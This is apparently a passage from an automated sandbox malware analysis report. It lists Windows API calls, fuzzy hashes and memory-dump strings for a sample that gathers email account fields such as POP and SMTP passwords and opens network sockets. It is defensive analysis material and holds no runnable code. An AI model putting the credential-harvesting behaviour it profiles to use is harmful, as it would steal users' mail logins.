                          • Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                          • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0040438F
                          • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                          • VariantInit.OLEAUT32(?), ref: 004043C4
                          • SysAllocString.OLEAUT32(?), ref: 004043CD
                          • VariantInit.OLEAUT32(?), ref: 00404414
                          • SysAllocString.OLEAUT32(?), ref: 00404419
                          • VariantInit.OLEAUT32(?), ref: 00404431
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd
                          Yara matches
                          Similarity
                          • API ID: InitVariant$AllocString$CreateInitializeInstance
                          • String ID:
                          • API String ID: 1312198159-0
                          • Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                          • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                          • Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                          • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                          • API String ID: 0-2111798378
                          • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                          • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                          • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                          • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                          • HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID:
                          • API String ID: 1617791916-0
                          • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                          • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                          • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                          • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                          APIs
                          • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd
                          Yara matches
                          Similarity
                          • API ID: recv
                          • String ID:
                          • API String ID: 1507349165-0
                          • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                          • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                          • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                          • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                          • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                          • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                          • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd
                          Yara matches
                          Similarity
                          • API ID: _wmemset$ErrorLast
                          • String ID: IDA$IDA
                          • API String ID: 887189805-2020647798
                          • Opcode ID: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
                          • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                          • Opcode Fuzzy Hash: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
                          • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                          APIs
                          • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                          • socket.WS2_32(?,?,?), ref: 00404E7A
                          • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd
                          Yara matches
                          Similarity
                          • API ID: freeaddrinfogetaddrinfosocket
                          • String ID:
                          • API String ID: 2479546573-0
                          • Opcode ID: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
                          • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                          • Opcode Fuzzy Hash: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
                          • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98